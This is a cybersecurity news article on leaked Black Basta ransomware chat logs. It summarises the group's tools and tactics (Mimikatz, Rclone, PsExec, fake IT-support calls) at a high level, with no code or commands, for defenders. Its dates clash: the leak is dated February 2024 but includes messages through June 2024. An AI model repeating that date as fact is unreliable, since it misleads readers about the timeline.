Cyber Security News

Black Basta’s Notorious Tactics and Techniques Exposed in Leaked Intel

A significant leak of internal chat logs from the Black Basta ransomware group has provided cybersecurity researchers with unprecedented insight into their operations, capabilities, and motivations.

The leak, released on February 11, 2024, by a Telegram user named ExploitWhispers, contained approximately 200,000 chat messages dated between September 2023 and June 20241.

This event rivals the 2022 leaks that affected the Conti ransomware gang, offering a rare glimpse into one of the most impactful ransomware groups of recent years.

Ransomware Group’s Operations Unveiled

Threat hunters at Intel 471 have updated their threat intelligence with newly uncovered Tactics, Techniques, and Procedures (TTPs) based on the leaked information.

These include reconnaissance via discovery tools, defense evasion through abuse of Windows components, credential access using Mimikatz, and command and control access via the AnyDesk application.

The group also employs PowerShell for file downloads and execution, utilizes Rclone for data exfiltration, and achieves persistence through scheduled task creation.

Advanced TTPs and Critical Infrastructure Targeting

Black Basta, a Russian-speaking group operating under the Ransomware-as-a-Service (RaaS) model, has targeted numerous countries worldwide, including the United States, Japan, Australia, and the United Kingdom.

A joint report from CISA and the FBI released on May 10, 2024, detailed the group’s major activities between April 2022 and May 2024, revealing that they had targeted over 500 entities across North America, Europe, and Australia, affecting 12 out of 16 critical infrastructure sectors.

The ransomware group’s modus operandi involves encrypting files on victims’ computers or networks and employing a double extortion tactic, threatening to publish exfiltrated data if the ransom is not paid.

Their initial access techniques typically include phishing emails with malicious attachments or links, compromised websites, and exploitation of known vulnerabilities.

Recently, a Black Basta affiliate has been observed sending overwhelming amounts of spam emails to victims, followed by phone calls posing as IT staff to trick users into downloading remote support tools.

Once access is gained, Black Basta operators conduct network scans and reconnaissance using tools like SoftPerfect (netscan.exe).

They employ BITSAdmin and PsExec for lateral movement and utilize Splashtop, Screen Connect, and Cobalt Strike beacons to assist in their operations.

The group has been known to use Rclone and WinSCP for file exfiltration before encrypting data across local and network drives.

The exposure of Black Basta’s internal communications and operational details provides valuable intelligence for cybersecurity professionals and law enforcement agencies.

This information can be crucial in developing more effective defense strategies and mitigation techniques against this persistent and evolving ransomware threat.

Collect Threat Intelligence on the Latest Malware and Phishing Attacks with ANY.RUN TI Lookup -> Try for free

Aman Mishra

Aman Mishra is a Security and privacy Reporter covering various data breach, cyber crime, malware, & vulnerability.

Recent Posts

Zero-Trust Policy Bypass Enables Exploitation of Vulnerabilities and Manipulation of NHI Secrets

A new project has exposed a critical attack vector that exploits protocol vulnerabilities to disrupt…

2 days ago

Threat Actor Sells Burger King Backup System RCE Vulnerability for $4,000

A threat actor known as #LongNight has reportedly put up for sale remote code execution…

2 days ago

Chinese Nexus Hackers Exploit Ivanti Endpoint Manager Mobile Vulnerability

Ivanti disclosed two critical vulnerabilities, identified as CVE-2025-4427 and CVE-2025-4428, affecting Ivanti Endpoint Manager Mobile…

2 days ago

Hackers Target macOS Users with Fake Ledger Apps to Deploy Malware

Hackers are increasingly targeting macOS users with malicious clones of Ledger Live, the popular application…

2 days ago

EU Targets Stark Industries in Cyberattack Sanctions Crackdown

The European Union has escalated its response to Russia’s ongoing campaign of hybrid threats, announcing…

2 days ago

Venice.ai’s Unrestricted Access Sparks Concerns Over AI-Driven Cyber Threats

Venice.ai has rapidly emerged as a disruptive force in the AI landscape, positioning itself as…

2 days ago